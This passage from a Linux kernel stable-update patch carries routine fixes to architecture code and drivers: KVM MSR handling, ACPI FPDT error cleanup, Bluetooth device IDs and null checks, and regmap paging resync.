++	extrd,u		\pte,PFN_START_BIT,PFN_START_BIT+1,\pte
+ 	depdi		_PAGE_SIZE_ENCODING_DEFAULT,63,\
+ 				(63-58)+PAGE_ADD_SHIFT,\pte
+ #endif
+diff --git a/arch/parisc/kernel/head.S b/arch/parisc/kernel/head.S
+index fd15fd4bbb61b..5a7d43c0f469c 100644
+--- a/arch/parisc/kernel/head.S
++++ b/arch/parisc/kernel/head.S
+@@ -70,9 +70,8 @@ $bss_loop:
+ 	stw,ma          %arg2,4(%r1)
+ 	stw,ma          %arg3,4(%r1)
+ 
+-#if !defined(CONFIG_64BIT) && defined(CONFIG_PA20)
+-	/* This 32-bit kernel was compiled for PA2.0 CPUs. Check current CPU
+-	 * and halt kernel if we detect a PA1.x CPU. */
++#if defined(CONFIG_PA20)
++	/* check for 64-bit capable CPU as required by current kernel */
+ 	ldi		32,%r10
+ 	mtctl		%r10,%cr11
+ 	.level 2.0
+diff --git a/arch/powerpc/perf/core-book3s.c b/arch/powerpc/perf/core-book3s.c
+index 942aa830e110e..e3c31c771ce91 100644
+--- a/arch/powerpc/perf/core-book3s.c
++++ b/arch/powerpc/perf/core-book3s.c
+@@ -1371,8 +1371,7 @@ static void power_pmu_disable(struct pmu *pmu)
+ 		/*
+ 		 * Disable instruction sampling if it was enabled
+ 		 */
+-		if (cpuhw->mmcr.mmcra & MMCRA_SAMPLE_ENABLE)
+-			val &= ~MMCRA_SAMPLE_ENABLE;
++		val &= ~MMCRA_SAMPLE_ENABLE;
+ 
+ 		/* Disable BHRB via mmcra (BHRBRD) for p10 */
+ 		if (ppmu->flags & PPMU_ARCH_31)
+@@ -1383,7 +1382,7 @@ static void power_pmu_disable(struct pmu *pmu)
+ 		 * instruction sampling or BHRB.
+ 		 */
+ 		if (val != mmcra) {
+-			mtspr(SPRN_MMCRA, mmcra);
++			mtspr(SPRN_MMCRA, val);
+ 			mb();
+ 			isync();
+ 		}
+diff --git a/arch/powerpc/platforms/powernv/opal-prd.c b/arch/powerpc/platforms/powernv/opal-prd.c
+index 113bdb151f687..40e26e9f318fd 100644
+--- a/arch/powerpc/platforms/powernv/opal-prd.c
++++ b/arch/powerpc/platforms/powernv/opal-prd.c
+@@ -24,13 +24,20 @@
+ #include <linux/uaccess.h>
+ 
+ 
++struct opal_prd_msg {
++	union {
++		struct opal_prd_msg_header header;
++		DECLARE_FLEX_ARRAY(u8, data);
++	};
++};
++
+ /*
+  * The msg member must be at the end of the struct, as it's followed by the
+  * message data.
+  */
+ struct opal_prd_msg_queue_item {
+-	struct list_head		list;
+-	struct opal_prd_msg_header	msg;
++	struct list_head	list;
++	struct opal_prd_msg	msg;
+ };
+ 
+ static struct device_node *prd_node;
+@@ -156,7 +163,7 @@ static ssize_t opal_prd_read(struct file *file, char __user *buf,
+ 	int rc;
+ 
+ 	/* we need at least a header's worth of data */
+-	if (count < sizeof(item->msg))
++	if (count < sizeof(item->msg.header))
+ 		return -EINVAL;
+ 
+ 	if (*ppos)
+@@ -186,7 +193,7 @@ static ssize_t opal_prd_read(struct file *file, char __user *buf,
+ 			return -EINTR;
+ 	}
+ 
+-	size = be16_to_cpu(item->msg.size);
++	size = be16_to_cpu(item->msg.header.size);
+ 	if (size > count) {
+ 		err = -EINVAL;
+ 		goto err_requeue;
+@@ -352,7 +359,7 @@ static int opal_prd_msg_notifier(struct notifier_block *nb,
+ 	if (!item)
+ 		return -ENOMEM;
+ 
+-	memcpy(&item->msg, msg->params, msg_size);
++	memcpy(&item->msg.data, msg->params, msg_size);
+ 
+ 	spin_lock_irqsave(&opal_prd_msg_queue_lock, flags);
+ 	list_add_tail(&item->list, &opal_prd_msg_queue);
+diff --git a/arch/riscv/include/asm/page.h b/arch/riscv/include/asm/page.h
+index ac70b0fd9a9a3..86048c60f7002 100644
+--- a/arch/riscv/include/asm/page.h
++++ b/arch/riscv/include/asm/page.h
+@@ -38,8 +38,8 @@
+ #define PAGE_OFFSET		_AC(CONFIG_PAGE_OFFSET, UL)
+ #endif
+ /*
+- * By default, CONFIG_PAGE_OFFSET value corresponds to SV48 address space so
+- * define the PAGE_OFFSET value for SV39.
++ * By default, CONFIG_PAGE_OFFSET value corresponds to SV57 address space so
++ * define the PAGE_OFFSET value for SV48 and SV39.
+  */
+ #define PAGE_OFFSET_L4		_AC(0xffffaf8000000000, UL)
+ #define PAGE_OFFSET_L3		_AC(0xffffffd800000000, UL)
+diff --git a/arch/riscv/kernel/probes/simulate-insn.c b/arch/riscv/kernel/probes/simulate-insn.c
+index a20568bd1f1a8..41bf1eb0110dd 100644
+--- a/arch/riscv/kernel/probes/simulate-insn.c
++++ b/arch/riscv/kernel/probes/simulate-insn.c
+@@ -24,7 +24,7 @@ static inline bool rv_insn_reg_set_val(struct pt_regs *regs, u32 index,
+ 				       unsigned long val)
+ {
+ 	if (index == 0)
+-		return false;
++		return true;
+ 	else if (index <= 31)
+ 		*((unsigned long *)regs + index) = val;
+ 	else
+diff --git a/arch/riscv/kernel/smp.c b/arch/riscv/kernel/smp.c
+index 8c3b59f1f9b80..7f534023f4ffe 100644
+--- a/arch/riscv/kernel/smp.c
++++ b/arch/riscv/kernel/smp.c
+@@ -58,7 +58,6 @@ int riscv_hartid_to_cpuid(unsigned long hartid)
+ 		if (cpuid_to_hartid_map(i) == hartid)
+ 			return i;
+ 
+-	pr_err("Couldn't find cpu id for hartid [%lu]\n", hartid);
+ 	return -ENOENT;
+ }
+ 
+diff --git a/arch/riscv/mm/ptdump.c b/arch/riscv/mm/ptdump.c
+index 20a9f991a6d74..e9090b38f8117 100644
+--- a/arch/riscv/mm/ptdump.c
++++ b/arch/riscv/mm/ptdump.c
+@@ -384,6 +384,9 @@ static int __init ptdump_init(void)
+ 
+ 	kernel_ptd_info.base_addr = KERN_VIRT_START;
+ 
++	pg_level[1].name = pgtable_l5_enabled ? "P4D" : "PGD";
++	pg_level[2].name = pgtable_l4_enabled ? "PUD" : "PGD";
++
+ 	for (i = 0; i < ARRAY_SIZE(pg_level); i++)
+ 		for (j = 0; j < ARRAY_SIZE(pte_bits); j++)
+ 			pg_level[i].mask |= pte_bits[j].mask;
+diff --git a/arch/s390/mm/page-states.c b/arch/s390/mm/page-states.c
+index d5ea09d78938b..7bea3be8b8280 100644
+--- a/arch/s390/mm/page-states.c
++++ b/arch/s390/mm/page-states.c
+@@ -132,7 +132,7 @@ static void mark_kernel_pud(p4d_t *p4d, unsigned long addr, unsigned long end)
+ 			continue;
+ 		if (!pud_folded(*pud)) {
+ 			page = phys_to_page(pud_val(*pud));
+-			for (i = 0; i < 3; i++)
++			for (i = 0; i < 4; i++)
+ 				set_bit(PG_arch_1, &page[i].flags);
+ 		}
+ 		mark_kernel_pmd(pud, addr, next);
+@@ -153,7 +153,7 @@ static void mark_kernel_p4d(pgd_t *pgd, unsigned long addr, unsigned long end)
+ 			continue;
+ 		if (!p4d_folded(*p4d)) {
+ 			page = phys_to_page(p4d_val(*p4d));
+-			for (i = 0; i < 3; i++)
++			for (i = 0; i < 4; i++)
+ 				set_bit(PG_arch_1, &page[i].flags);
+ 		}
+ 		mark_kernel_pud(p4d, addr, next);
+@@ -175,7 +175,7 @@ static void mark_kernel_pgd(void)
+ 			continue;
+ 		if (!pgd_folded(*pgd)) {
+ 			page = phys_to_page(pgd_val(*pgd));
+-			for (i = 0; i < 3; i++)
++			for (i = 0; i < 4; i++)
+ 				set_bit(PG_arch_1, &page[i].flags);
+ 		}
+ 		mark_kernel_p4d(pgd, addr, next);
+diff --git a/arch/x86/crypto/sha1_ssse3_glue.c b/arch/x86/crypto/sha1_ssse3_glue.c
+index 44340a1139e0b..959afa705e95c 100644
+--- a/arch/x86/crypto/sha1_ssse3_glue.c
++++ b/arch/x86/crypto/sha1_ssse3_glue.c
+@@ -24,8 +24,17 @@
+ #include <linux/types.h>
+ #include <crypto/sha1.h>
+ #include <crypto/sha1_base.h>
++#include <asm/cpu_device_id.h>
+ #include <asm/simd.h>
+ 
++static const struct x86_cpu_id module_cpu_ids[] = {
++	X86_MATCH_FEATURE(X86_FEATURE_AVX2, NULL),
++	X86_MATCH_FEATURE(X86_FEATURE_AVX, NULL),
++	X86_MATCH_FEATURE(X86_FEATURE_SSSE3, NULL),
++	{}
++};
++MODULE_DEVICE_TABLE(x86cpu, module_cpu_ids);
++
+ static int sha1_update(struct shash_desc *desc, const u8 *data,
+ 			     unsigned int len, sha1_block_fn *sha1_xform)
+ {
+@@ -301,6 +310,9 @@ static inline void unregister_sha1_ni(void) { }
+ 
+ static int __init sha1_ssse3_mod_init(void)
+ {
++	if (!x86_match_cpu(module_cpu_ids))
++		return -ENODEV;
++
+ 	if (register_sha1_ssse3())
+ 		goto fail;
+ 
+diff --git a/arch/x86/crypto/sha256_ssse3_glue.c b/arch/x86/crypto/sha256_ssse3_glue.c
+index 3a5f6be7dbba4..d25235f0ccafc 100644
+--- a/arch/x86/crypto/sha256_ssse3_glue.c
++++ b/arch/x86/crypto/sha256_ssse3_glue.c
+@@ -38,11 +38,20 @@
+ #include <crypto/sha2.h>
+ #include <crypto/sha256_base.h>
+ #include <linux/string.h>
++#include <asm/cpu_device_id.h>
+ #include <asm/simd.h>
+ 
+ asmlinkage void sha256_transform_ssse3(struct sha256_state *state,
+ 				       const u8 *data, int blocks);
+ 
++static const struct x86_cpu_id module_cpu_ids[] = {
++	X86_MATCH_FEATURE(X86_FEATURE_AVX2, NULL),
++	X86_MATCH_FEATURE(X86_FEATURE_AVX, NULL),
++	X86_MATCH_FEATURE(X86_FEATURE_SSSE3, NULL),
++	{}
++};
++MODULE_DEVICE_TABLE(x86cpu, module_cpu_ids);
++
+ static int _sha256_update(struct shash_desc *desc, const u8 *data,
+ 			  unsigned int len, sha256_block_fn *sha256_xform)
+ {
+@@ -366,6 +375,9 @@ static inline void unregister_sha256_ni(void) { }
+ 
+ static int __init sha256_ssse3_mod_init(void)
+ {
++	if (!x86_match_cpu(module_cpu_ids))
++		return -ENODEV;
++
+ 	if (register_sha256_ssse3())
+ 		goto fail;
+ 
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 016fb500b3a6f..ec955ab2ff034 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -551,6 +551,7 @@
+ #define MSR_AMD64_CPUID_FN_1		0xc0011004
+ #define MSR_AMD64_LS_CFG		0xc0011020
+ #define MSR_AMD64_DC_CFG		0xc0011022
++#define MSR_AMD64_TW_CFG		0xc0011023
+ 
+ #define MSR_AMD64_DE_CFG		0xc0011029
+ #define MSR_AMD64_DE_CFG_LFENCE_SERIALIZE_BIT	 1
+diff --git a/arch/x86/include/asm/numa.h b/arch/x86/include/asm/numa.h
+index e3bae2b60a0db..ef2844d691735 100644
+--- a/arch/x86/include/asm/numa.h
++++ b/arch/x86/include/asm/numa.h
+@@ -12,13 +12,6 @@
+ 
+ #define NR_NODE_MEMBLKS		(MAX_NUMNODES*2)
+ 
+-/*
+- * Too small node sizes may confuse the VM badly. Usually they
+- * result from BIOS bugs. So dont recognize nodes as standalone
+- * NUMA entities that have less than this amount of RAM listed:
+- */
+-#define NODE_MIN_SIZE (4*1024*1024)
+-
+ extern int numa_off;
+ 
+ /*
+diff --git a/arch/x86/kernel/cpu/hygon.c b/arch/x86/kernel/cpu/hygon.c
+index c393b8773ace6..9e8380bd4fb9f 100644
+--- a/arch/x86/kernel/cpu/hygon.c
++++ b/arch/x86/kernel/cpu/hygon.c
+@@ -86,8 +86,12 @@ static void hygon_get_topology(struct cpuinfo_x86 *c)
+ 		if (!err)
+ 			c->x86_coreid_bits = get_count_order(c->x86_max_cores);
+ 
+-		/* Socket ID is ApicId[6] for these processors. */
+-		c->phys_proc_id = c->apicid >> APICID_SOCKET_ID_BIT;
++		/*
++		 * Socket ID is ApicId[6] for the processors with model <= 0x3
++		 * when running on host.
++		 */
++		if (!boot_cpu_has(X86_FEATURE_HYPERVISOR) && c->x86_model <= 0x3)
++			c->phys_proc_id = c->apicid >> APICID_SOCKET_ID_BIT;
+ 
+ 		cacheinfo_hygon_init_llc_id(c, cpu);
+ 	} else if (cpu_has(c, X86_FEATURE_NODEID_MSR)) {
+diff --git a/arch/x86/kvm/hyperv.c b/arch/x86/kvm/hyperv.c
+index 0adf4a437e85f..04cca46fed1e8 100644
+--- a/arch/x86/kvm/hyperv.c
++++ b/arch/x86/kvm/hyperv.c
+@@ -705,10 +705,12 @@ static int stimer_set_count(struct kvm_vcpu_hv_stimer *stimer, u64 count,
+ 
+ 	stimer_cleanup(stimer);
+ 	stimer->count = count;
+-	if (stimer->count == 0)
+-		stimer->config.enable = 0;
+-	else if (stimer->config.auto_enable)
+-		stimer->config.enable = 1;
++	if (!host) {
++		if (stimer->count == 0)
++			stimer->config.enable = 0;
++		else if (stimer->config.auto_enable)
++			stimer->config.enable = 1;
++	}
+ 
+ 	if (stimer->config.enable)
+ 		stimer_mark_pending(stimer, false);
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index 7e8dbd54869a6..4dba0a84ba2f3 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2294,22 +2294,22 @@ EXPORT_SYMBOL_GPL(kvm_lapic_set_eoi);
+ void kvm_apic_write_nodecode(struct kvm_vcpu *vcpu, u32 offset)
+ {
+ 	struct kvm_lapic *apic = vcpu->arch.apic;
+-	u64 val;
+ 
+ 	/*
+-	 * ICR is a single 64-bit register when x2APIC is enabled.  For legacy
+-	 * xAPIC, ICR writes need to go down the common (slightly slower) path
+-	 * to get the upper half from ICR2.
++	 * ICR is a single 64-bit register when x2APIC is enabled, all others
++	 * registers hold 32-bit values.  For legacy xAPIC, ICR writes need to
++	 * go down the common path to get the upper half from ICR2.
++	 *
++	 * Note, using the write helpers may incur an unnecessary write to the
++	 * virtual APIC state, but KVM needs to conditionally modify the value
++	 * in certain cases, e.g. to clear the ICR busy bit.  The cost of extra
++	 * conditional branches is likely a wash relative to the cost of the
++	 * maybe-unnecessary write, and both are in the noise anyways.
+ 	 */
+-	if (apic_x2apic_mode(apic) && offset == APIC_ICR) {
+-		val = kvm_lapic_get_reg64(apic, APIC_ICR);
+-		kvm_apic_send_ipi(apic, (u32)val, (u32)(val >> 32));
+-		trace_kvm_apic_write(APIC_ICR, val);
+-	} else {
+-		/* TODO: optimize to just emulate side effect w/o one more write */
+-		val = kvm_lapic_get_reg(apic, offset);
+-		kvm_lapic_reg_write(apic, offset, (u32)val);
+-	}
++	if (apic_x2apic_mode(apic) && offset == APIC_ICR)
++		kvm_x2apic_icr_write(apic, kvm_lapic_get_reg64(apic, APIC_ICR));
++	else
++		kvm_lapic_reg_write(apic, offset, kvm_lapic_get_reg(apic, offset));
+ }
+ EXPORT_SYMBOL_GPL(kvm_apic_write_nodecode);
+ 
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 4d6baae1ae748..7144e51668136 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -3582,6 +3582,7 @@ int kvm_set_msr_common(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 	case MSR_AMD64_PATCH_LOADER:
+ 	case MSR_AMD64_BU_CFG2:
+ 	case MSR_AMD64_DC_CFG:
++	case MSR_AMD64_TW_CFG:
+ 	case MSR_F15H_EX_CFG:
+ 		break;
+ 
+@@ -3982,6 +3983,7 @@ int kvm_get_msr_common(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 	case MSR_AMD64_BU_CFG2:
+ 	case MSR_IA32_PERF_CTL:
+ 	case MSR_AMD64_DC_CFG:
++	case MSR_AMD64_TW_CFG:
+ 	case MSR_F15H_EX_CFG:
+ 	/*
+ 	 * Intel Sandy Bridge CPUs must support the RAPL (running average power
+diff --git a/arch/x86/mm/numa.c b/arch/x86/mm/numa.c
+index c01c5506fd4ae..aa39d678fe81d 100644
+--- a/arch/x86/mm/numa.c
++++ b/arch/x86/mm/numa.c
+@@ -602,13 +602,6 @@ static int __init numa_register_memblks(struct numa_meminfo *mi)
+ 		if (start >= end)
+ 			continue;
+ 
+-		/*
+-		 * Don't confuse VM with a node that doesn't have the
+-		 * minimum amount of memory:
+-		 */
+-		if (end && (end - start) < NODE_MIN_SIZE)
+-			continue;
+-
+ 		alloc_node_data(nid);
+ 	}
+ 
+diff --git a/crypto/pcrypt.c b/crypto/pcrypt.c
+index 9d10b846ccf73..005a36cb21bc4 100644
+--- a/crypto/pcrypt.c
++++ b/crypto/pcrypt.c
+@@ -117,6 +117,8 @@ static int pcrypt_aead_encrypt(struct aead_request *req)
+ 	err = padata_do_parallel(ictx->psenc, padata, &ctx->cb_cpu);
+ 	if (!err)
+ 		return -EINPROGRESS;
++	if (err == -EBUSY)
++		return -EAGAIN;
+ 
+ 	return err;
+ }
+@@ -164,6 +166,8 @@ static int pcrypt_aead_decrypt(struct aead_request *req)
+ 	err = padata_do_parallel(ictx->psdec, padata, &ctx->cb_cpu);
+ 	if (!err)
+ 		return -EINPROGRESS;
++	if (err == -EBUSY)
++		return -EAGAIN;
+ 
+ 	return err;
+ }
+diff --git a/drivers/acpi/acpi_fpdt.c b/drivers/acpi/acpi_fpdt.c
+index a2056c4c8cb70..271092f2700a1 100644
+--- a/drivers/acpi/acpi_fpdt.c
++++ b/drivers/acpi/acpi_fpdt.c
+@@ -194,12 +194,19 @@ static int fpdt_process_subtable(u64 address, u32 subtable_type)
+ 		record_header = (void *)subtable_header + offset;
+ 		offset += record_header->length;
+ 
++		if (!record_header->length) {
++			pr_err(FW_BUG "Zero-length record found in FPDT.\n");
++			result = -EINVAL;
++			goto err;
++		}
++
+ 		switch (record_header->type) {
+ 		case RECORD_S3_RESUME:
+ 			if (subtable_type != SUBTABLE_S3PT) {
+ 				pr_err(FW_BUG "Invalid record %d for subtable %s\n",
+ 				     record_header->type, signature);
+-				return -EINVAL;
++				result = -EINVAL;
++				goto err;
+ 			}
+ 			if (record_resume) {
+ 				pr_err("Duplicate resume performance record found.\n");
+@@ -208,7 +215,7 @@ static int fpdt_process_subtable(u64 address, u32 subtable_type)
+ 			record_resume = (struct resume_performance_record *)record_header;
+ 			result = sysfs_create_group(fpdt_kobj, &resume_attr_group);
+ 			if (result)
+-				return result;
++				goto err;
+ 			break;
+ 		case RECORD_S3_SUSPEND:
+ 			if (subtable_type != SUBTABLE_S3PT) {
+@@ -223,13 +230,14 @@ static int fpdt_process_subtable(u64 address, u32 subtable_type)
+ 			record_suspend = (struct suspend_performance_record *)record_header;
+ 			result = sysfs_create_group(fpdt_kobj, &suspend_attr_group);
+ 			if (result)
+-				return result;
++				goto err;
+ 			break;
+ 		case RECORD_BOOT:
+ 			if (subtable_type != SUBTABLE_FBPT) {
+ 				pr_err(FW_BUG "Invalid %d for subtable %s\n",
+ 				     record_header->type, signature);
+-				return -EINVAL;
++				result = -EINVAL;
++				goto err;
+ 			}
+ 			if (record_boot) {
+ 				pr_err("Duplicate boot performance record found.\n");
+@@ -238,7 +246,7 @@ static int fpdt_process_subtable(u64 address, u32 subtable_type)
+ 			record_boot = (struct boot_performance_record *)record_header;
+ 			result = sysfs_create_group(fpdt_kobj, &boot_attr_group);
+ 			if (result)
+-				return result;
++				goto err;
+ 			break;
+ 
+ 		default:
+@@ -247,6 +255,18 @@ static int fpdt_process_subtable(u64 address, u32 subtable_type)
+ 		}
+ 	}
+ 	return 0;
++
++err:
++	if (record_boot)
++		sysfs_remove_group(fpdt_kobj, &boot_attr_group);
++
++	if (record_suspend)
++		sysfs_remove_group(fpdt_kobj, &suspend_attr_group);
++
++	if (record_resume)
++		sysfs_remove_group(fpdt_kobj, &resume_attr_group);
++
++	return result;
+ }
+ 
+ static int __init acpi_init_fpdt(void)
+@@ -255,6 +275,7 @@ static int __init acpi_init_fpdt(void)
+ 	struct acpi_table_header *header;
+ 	struct fpdt_subtable_entry *subtable;
+ 	u32 offset = sizeof(*header);
++	int result;
+ 
+ 	status = acpi_get_table(ACPI_SIG_FPDT, 0, &header);
+ 
+@@ -263,8 +284,8 @@ static int __init acpi_init_fpdt(void)
+ 
+ 	fpdt_kobj = kobject_create_and_add("fpdt", acpi_kobj);
+ 	if (!fpdt_kobj) {
+-		acpi_put_table(header);
+-		return -ENOMEM;
++		result = -ENOMEM;
++		goto err_nomem;
+ 	}
+ 
+ 	while (offset < header->length) {
+@@ -272,8 +293,10 @@ static int __init acpi_init_fpdt(void)
+ 		switch (subtable->type) {
+ 		case SUBTABLE_FBPT:
+ 		case SUBTABLE_S3PT:
+-			fpdt_process_subtable(subtable->address,
++			result = fpdt_process_subtable(subtable->address,
+ 					      subtable->type);
++			if (result)
++				goto err_subtable;
+ 			break;
+ 		default:
+ 			/* Other types are reserved in ACPI 6.4 spec. */
+@@ -282,6 +305,12 @@ static int __init acpi_init_fpdt(void)
+ 		offset += sizeof(*subtable);
+ 	}
+ 	return 0;
++err_subtable:
++	kobject_put(fpdt_kobj);
++
++err_nomem:
++	acpi_put_table(header);
++	return result;
+ }
+ 
+ fs_initcall(acpi_init_fpdt);
+diff --git a/drivers/acpi/ec.c b/drivers/acpi/ec.c
+index 8bb233d2d1e48..77d1f2cb89ef3 100644
+--- a/drivers/acpi/ec.c
++++ b/drivers/acpi/ec.c
+@@ -1897,6 +1897,16 @@ static const struct dmi_system_id ec_dmi_table[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "HP Pavilion Gaming Laptop 15-dk1xxx"),
+ 		},
+ 	},
++	{
++		/*
++		 * HP 250 G7 Notebook PC
++		 */
++		.callback = ec_honor_dsdt_gpe,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "HP 250 G7 Notebook PC"),
++		},
++	},
+ 	{
+ 		/*
+ 		 * Samsung hardware
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index af6fa801d1ed8..99bab31919e4c 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -499,6 +499,18 @@ static const struct dmi_system_id maingear_laptop[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "MG-VCP2-15A3070T"),
+ 		}
+ 	},
++	{
++		/* TongFang GMxXGxx/TUXEDO Polaris 15 Gen5 AMD */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GMxXGxx"),
++		},
++	},
++	{
++		/* TongFang GM6XGxX/TUXEDO Stellaris 16 Gen5 AMD */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GM6XGxX"),
++		},
++	},
+ 	{
+ 		.ident = "MAINGEAR Vector Pro 2 17",
+ 		.matches = {
+diff --git a/drivers/atm/iphase.c b/drivers/atm/iphase.c
+index 3241486869530..9bba8f280a4d4 100644
+--- a/drivers/atm/iphase.c
++++ b/drivers/atm/iphase.c
+@@ -2291,19 +2291,21 @@ static int get_esi(struct atm_dev *dev)
+ static int reset_sar(struct atm_dev *dev)  
+ {  
+ 	IADEV *iadev;  
+-	int i, error = 1;  
++	int i, error;
+ 	unsigned int pci[64];  
+ 	  
+ 	iadev = INPH_IA_DEV(dev);  
+-	for(i=0; i<64; i++)  
+-	  if ((error = pci_read_config_dword(iadev->pci,  
+-				i*4, &pci[i])) != PCIBIOS_SUCCESSFUL)  
+-  	      return error;  
++	for (i = 0; i < 64; i++) {
++		error = pci_read_config_dword(iadev->pci, i * 4, &pci[i]);
++		if (error != PCIBIOS_SUCCESSFUL)
++			return error;
++	}
+ 	writel(0, iadev->reg+IPHASE5575_EXT_RESET);  
+-	for(i=0; i<64; i++)  
+-	  if ((error = pci_write_config_dword(iadev->pci,  
+-					i*4, pci[i])) != PCIBIOS_SUCCESSFUL)  
+-	    return error;  
++	for (i = 0; i < 64; i++) {
++		error = pci_write_config_dword(iadev->pci, i * 4, pci[i]);
++		if (error != PCIBIOS_SUCCESSFUL)
++			return error;
++	}
+ 	udelay(5);  
+ 	return 0;  
+ }  
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index 380a53b6aee81..dbbe2cebb8917 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -1262,8 +1262,8 @@ static void __device_release_driver(struct device *dev, struct device *parent)
+ 		if (dev->bus && dev->bus->dma_cleanup)
+ 			dev->bus->dma_cleanup(dev);
+ 
+-		device_links_driver_cleanup(dev);
+ 		device_unbind_cleanup(dev);
++		device_links_driver_cleanup(dev);
+ 
+ 		klist_remove(&dev->p->knode_driver);
+ 		device_pm_check_callbacks(dev);
+diff --git a/drivers/base/regmap/regcache.c b/drivers/base/regmap/regcache.c
+index 8031007b4887d..cf3fa998093de 100644
+--- a/drivers/base/regmap/regcache.c
++++ b/drivers/base/regmap/regcache.c
+@@ -331,6 +331,11 @@ static int regcache_default_sync(struct regmap *map, unsigned int min,
+ 	return 0;
+ }
+ 
++static int rbtree_all(const void *key, const struct rb_node *node)
++{
++	return 0;
++}
++
+ /**
+  * regcache_sync - Sync the register cache with the hardware.
+  *
+@@ -348,6 +353,7 @@ int regcache_sync(struct regmap *map)
+ 	unsigned int i;
+ 	const char *name;
+ 	bool bypass;
++	struct rb_node *node;
+ 
+ 	if (WARN_ON(map->cache_type == REGCACHE_NONE))
+ 		return -EINVAL;
+@@ -392,6 +398,30 @@ out:
+ 	map->async = false;
+ 	map->cache_bypass = bypass;
+ 	map->no_sync_defaults = false;
++
++	/*
++	 * If we did any paging with cache bypassed and a cached
++	 * paging register then the register and cache state might
++	 * have gone out of sync, force writes of all the paging
++	 * registers.
++	 */
++	rb_for_each(node, 0, &map->range_tree, rbtree_all) {
++		struct regmap_range_node *this =
++			rb_entry(node, struct regmap_range_node, node);
++
++		/* If there's nothing in the cache there's nothing to sync */
++		ret = regcache_read(map, this->selector_reg, &i);
++		if (ret != 0)
++			continue;
++
++		ret = _regmap_write(map, this->selector_reg, i);
++		if (ret != 0) {
++			dev_err(map->dev, "Failed to write %x = %x: %d\n",
++				this->selector_reg, i, ret);
++			break;
++		}
++	}
++
+ 	map->unlock(map->lock_arg);
+ 
+ 	regmap_async_complete(map);
+diff --git a/drivers/block/virtio_blk.c b/drivers/block/virtio_blk.c
+index a7697027ce43b..efa5535a8e1d8 100644
+--- a/drivers/block/virtio_blk.c
++++ b/drivers/block/virtio_blk.c
+@@ -900,6 +900,7 @@ static int virtblk_probe(struct virtio_device *vdev)
+ 	u16 min_io_size;
+ 	u8 physical_block_exp, alignment_offset;
+ 	unsigned int queue_depth;
++	size_t max_dma_size;
+ 
+ 	if (!vdev->config->get) {
+ 		dev_err(&vdev->dev, "%s failure: config access disabled\n",
+@@ -998,7 +999,8 @@ static int virtblk_probe(struct virtio_device *vdev)
+ 	/* No real sector limit. */
+ 	blk_queue_max_hw_sectors(q, -1U);
+ 
+-	max_size = virtio_max_dma_size(vdev);
++	max_dma_size = virtio_max_dma_size(vdev);
++	max_size = max_dma_size > U32_MAX ? U32_MAX : max_dma_size;
+ 
+ 	/* Host can optionally specify maximum segment size and number of
+ 	 * segments. */
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 96d4f48e36011..954f7f3b5cc30 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -532,6 +532,18 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x13d3, 0x3592), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+ 
++	/* Realtek 8852BE Bluetooth devices */
++	{ USB_DEVICE(0x0cb8, 0xc559), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x0bda, 0x887b), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x0bda, 0xb85b), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x13d3, 0x3570), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x13d3, 0x3571), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++
+ 	/* Realtek Bluetooth devices */
+ 	{ USB_VENDOR_AND_INTERFACE_INFO(0x0bda, 0xe0, 0x01, 0x01),
+ 	  .driver_info = BTUSB_REALTEK },
+@@ -2638,6 +2650,9 @@ static int btusb_mtk_hci_wmt_sync(struct hci_dev *hdev,
+ 		goto err_free_wc;
+ 	}
+ 
++	if (data->evt_skb == NULL)
++		goto err_free_wc;
++
+ 	/* Parse and handle the return WMT event */
+ 	wmt_evt = (struct btmtk_hci_wmt_evt *)data->evt_skb->data;
+ 	if (wmt_evt->whdr.op != hdr->op) {
+diff --git a/drivers/clk/qcom/gcc-ipq6018.c b/drivers/clk/qcom/gcc-ipq6018.c
+index cde62a11f5736..4c5c7a8f41d08 100644
+--- a/drivers/clk/qcom/gcc-ipq6018.c
++++ b/drivers/clk/qcom/gcc-ipq6018.c
+@@ -75,7 +75,6 @@ static struct clk_fixed_factor gpll0_out_main_div2 = {
+ 				&gpll0_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_fixed_factor_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -89,7 +88,6 @@ static struct clk_alpha_pll_postdiv gpll0 = {
+ 				&gpll0_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
